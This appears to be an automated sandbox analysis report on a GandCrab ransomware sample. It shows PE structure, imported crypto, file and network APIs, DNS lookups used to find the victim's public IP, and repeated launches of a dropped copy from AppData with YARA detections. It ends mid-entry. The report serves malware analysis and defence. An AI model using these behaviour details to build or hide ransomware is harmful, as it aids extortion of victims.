IMAGE_DIRECTORY_ENTRY_RESOURCE	0x14000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x15000	0xaf4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x200	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8448	0x8600	False	0.4546991604477612	data	6.32052618210059	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xa000	0x7126	0x7200	False	0.47765899122807015	data	6.1644872822657275	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x12000	0xa84	0xc00	False	0.3056640625	data	3.538638851099626	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x13000	0x4	0x200	False	0.033203125	data	0.04078075625387198	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x14000	0x1e0	0x200	False	0.52734375	data	4.7176788329467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x15000	0xaf4	0xc00	False	0.7932942708333334	data	6.537931848954439	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x14060	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	ReadFile, SetFilePointer, GetFileAttributesW, GetLastError, MoveFileW, lstrcpyW, SetFileAttributesW, CreateMutexW, GetDriveTypeW, VerSetConditionMask, WaitForSingleObject, GetTickCount, InitializeCriticalSection, OpenProcess, GetSystemDirectoryW, TerminateThread, Sleep, TerminateProcess, VerifyVersionInfoW, WaitForMultipleObjects, DeleteCriticalSection, ExpandEnvironmentStringsW, lstrlenW, SetHandleInformation, lstrcatA, MultiByteToWideChar, CreatePipe, lstrcmpiA, Process32NextW, CreateToolhelp32Snapshot, LeaveCriticalSection, EnterCriticalSection, FindFirstFileW, lstrcmpW, FindClose, FindNextFileW, GetNativeSystemInfo, GetComputerNameW, GetDiskFreeSpaceW, GetWindowsDirectoryW, GetVolumeInformationW, LoadLibraryA, lstrcmpiW, VirtualFree, CreateThread, CloseHandle, lstrcatW, CreateFileMappingW, ExitThread, CreateFileW, GetModuleFileNameW, WriteFile, GetModuleHandleW, UnmapViewOfFile, MapViewOfFile, GetFileSize, GetEnvironmentVariableW, lstrcpyA, GetModuleHandleA, VirtualAlloc, GetProcAddress, Process32FirstW, GetTempPathW, GetProcessHeap, HeapFree, HeapAlloc, lstrlenA, CreateProcessW, ExitProcess, IsProcessorFeaturePresent
USER32.dll	BeginPaint, wsprintfW, TranslateMessage, LoadCursorW, LoadIconW, MessageBoxA, GetMessageW, EndPaint, DestroyWindow, RegisterClassExW, ShowWindow, CreateWindowExW, SendMessageW, DispatchMessageW, DefWindowProcW, UpdateWindow, wsprintfA, GetForegroundWindow, SetWindowLongW
GDI32.dll	TextOutW
ADVAPI32.dll	FreeSid, RegSetValueExW, RegCreateKeyExW, RegCloseKey, CryptExportKey, CryptAcquireContextW, CryptGetKeyParam, CryptReleaseContext, CryptImportKey, CryptEncrypt, CryptGenKey, CryptDestroyKey, GetUserNameW, RegQueryValueExW, RegOpenKeyExW, AllocateAndInitializeSid
SHELL32.dll	ShellExecuteW, SHGetSpecialFolderPathW, ShellExecuteExW
CRYPT32.dll	CryptStringToBinaryA, CryptBinaryToStringA
WININET.dll	InternetCloseHandle, HttpAddRequestHeadersW, HttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetOpenW, InternetReadFile
PSAPI.DLL	EnumDeviceDrivers, GetDeviceDriverBaseNameW

Exports

Name	Ordinal	Address
_ReflectiveLoader@0	1	0x10005ff0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 31, 2022 23:57:06.129142046 CEST	59683	53	192.168.2.4	8.8.8.8
Aug 31, 2022 23:57:06.148230076 CEST	53	59683	8.8.8.8	192.168.2.4
Aug 31, 2022 23:57:22.315282106 CEST	64167	53	192.168.2.4	8.8.8.8
Aug 31, 2022 23:57:22.333259106 CEST	53	64167	8.8.8.8	192.168.2.4
Aug 31, 2022 23:57:28.340138912 CEST	52239	53	192.168.2.4	8.8.8.8
Aug 31, 2022 23:57:28.359524012 CEST	53	52239	8.8.8.8	192.168.2.4
Aug 31, 2022 23:57:38.929553032 CEST	56807	53	192.168.2.4	8.8.8.8
Aug 31, 2022 23:57:38.949150085 CEST	53	56807	8.8.8.8	192.168.2.4
Aug 31, 2022 23:57:45.791605949 CEST	59444	53	192.168.2.4	8.8.8.8
Aug 31, 2022 23:57:45.811317921 CEST	53	59444	8.8.8.8	192.168.2.4
Aug 31, 2022 23:57:56.947793007 CEST	55570	53	192.168.2.4	8.8.8.8
Aug 31, 2022 23:57:56.965518951 CEST	53	55570	8.8.8.8	192.168.2.4
Aug 31, 2022 23:58:02.928319931 CEST	64906	53	192.168.2.4	8.8.8.8
Aug 31, 2022 23:58:02.947957039 CEST	53	64906	8.8.8.8	192.168.2.4
Aug 31, 2022 23:58:15.867604971 CEST	59446	53	192.168.2.4	8.8.8.8
Aug 31, 2022 23:58:15.885432959 CEST	53	59446	8.8.8.8	192.168.2.4
Aug 31, 2022 23:58:29.536561966 CEST	50861	53	192.168.2.4	8.8.8.8
Aug 31, 2022 23:58:29.558046103 CEST	53	50861	8.8.8.8	192.168.2.4
Aug 31, 2022 23:58:46.581418991 CEST	61088	53	192.168.2.4	8.8.8.8
Aug 31, 2022 23:58:46.599021912 CEST	53	61088	8.8.8.8	192.168.2.4
Aug 31, 2022 23:59:02.684118986 CEST	58729	53	192.168.2.4	8.8.8.8
Aug 31, 2022 23:59:02.701252937 CEST	53	58729	8.8.8.8	192.168.2.4
Aug 31, 2022 23:59:10.632801056 CEST	64700	53	192.168.2.4	8.8.8.8
Aug 31, 2022 23:59:10.652909040 CEST	53	64700	8.8.8.8	192.168.2.4
Aug 31, 2022 23:59:21.689377069 CEST	60550	53	192.168.2.4	8.8.8.8
Aug 31, 2022 23:59:21.708925962 CEST	53	60550	8.8.8.8	192.168.2.4
Aug 31, 2022 23:59:34.749181032 CEST	55673	53	192.168.2.4	8.8.8.8
Aug 31, 2022 23:59:34.769097090 CEST	53	55673	8.8.8.8	192.168.2.4
Aug 31, 2022 23:59:46.759083986 CEST	52437	53	192.168.2.4	8.8.8.8
Aug 31, 2022 23:59:46.777046919 CEST	53	52437	8.8.8.8	192.168.2.4
Aug 31, 2022 23:59:57.148920059 CEST	52825	53	192.168.2.4	8.8.8.8
Aug 31, 2022 23:59:57.168656111 CEST	53	52825	8.8.8.8	192.168.2.4
Sep 1, 2022 00:00:11.293533087 CEST	58530	53	192.168.2.4	8.8.8.8
Sep 1, 2022 00:00:11.310962915 CEST	53	58530	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 31, 2022 23:57:06.129142046 CEST	192.168.2.4	8.8.8.8	0xb918	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:57:22.315282106 CEST	192.168.2.4	8.8.8.8	0x3c2b	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:57:28.340138912 CEST	192.168.2.4	8.8.8.8	0xcc0e	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:57:38.929553032 CEST	192.168.2.4	8.8.8.8	0xd15d	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:57:45.791605949 CEST	192.168.2.4	8.8.8.8	0xc4ea	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:57:56.947793007 CEST	192.168.2.4	8.8.8.8	0x5ef8	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:58:02.928319931 CEST	192.168.2.4	8.8.8.8	0x9f47	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:58:15.867604971 CEST	192.168.2.4	8.8.8.8	0x93a8	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:58:29.536561966 CEST	192.168.2.4	8.8.8.8	0x2a7d	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:58:46.581418991 CEST	192.168.2.4	8.8.8.8	0x5d70	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:59:02.684118986 CEST	192.168.2.4	8.8.8.8	0x97b6	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:59:10.632801056 CEST	192.168.2.4	8.8.8.8	0x4d06	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:59:21.689377069 CEST	192.168.2.4	8.8.8.8	0xf04e	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:59:34.749181032 CEST	192.168.2.4	8.8.8.8	0x670d	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:59:46.759083986 CEST	192.168.2.4	8.8.8.8	0x8f79	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:59:57.148920059 CEST	192.168.2.4	8.8.8.8	0x52d6	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Sep 1, 2022 00:00:11.293533087 CEST	192.168.2.4	8.8.8.8	0x25b0	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wThN5MTIsw.exePID: 6388, Parent PID: 4180

General

Target ID:	0
Start time:	23:56:59
Start date:	31/08/2022
Path:	C:\Users\user\Desktop\wThN5MTIsw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\wThN5MTIsw.exe"
Imagebase:	0xf4e0000
File size:	71680 bytes
MD5 hash:	1813521F3884DE8427728B54B5C9A391
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.321170731.000000000F4EA000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 6592, Parent PID: 3528

General

Target ID:	2
Start time:	23:57:13
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000002.00000000.354396039.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, Author: ReversingLabs
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 6840, Parent PID: 3528

General

Target ID:	4
Start time:	23:57:24
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000004.00000000.373713609.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 7028, Parent PID: 3528

General

Target ID:	6
Start time:	23:57:32
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000006.00000002.406382399.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000006.00000000.391649222.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000006.00000002.406483395.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 5668, Parent PID: 3528

General

Target ID:	8
Start time:	23:57:40
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000008.00000002.421043250.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000008.00000002.421052694.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000008.00000000.408927489.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 6104, Parent PID: 3528

General

Target ID:	12
Start time:	23:57:48
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000C.00000002.445300926.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000C.00000000.426845599.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000C.00000002.445271222.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 4292, Parent PID: 3528

General

Target ID:	14
Start time:	23:57:57
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000E.00000000.444554151.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000E.00000002.457737689.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000E.00000002.457728648.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 1416, Parent PID: 3528

General

Target ID:	15
Start time:	23:58:05
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000F.00000002.485778645.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000F.00000000.462423463.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp, Author: 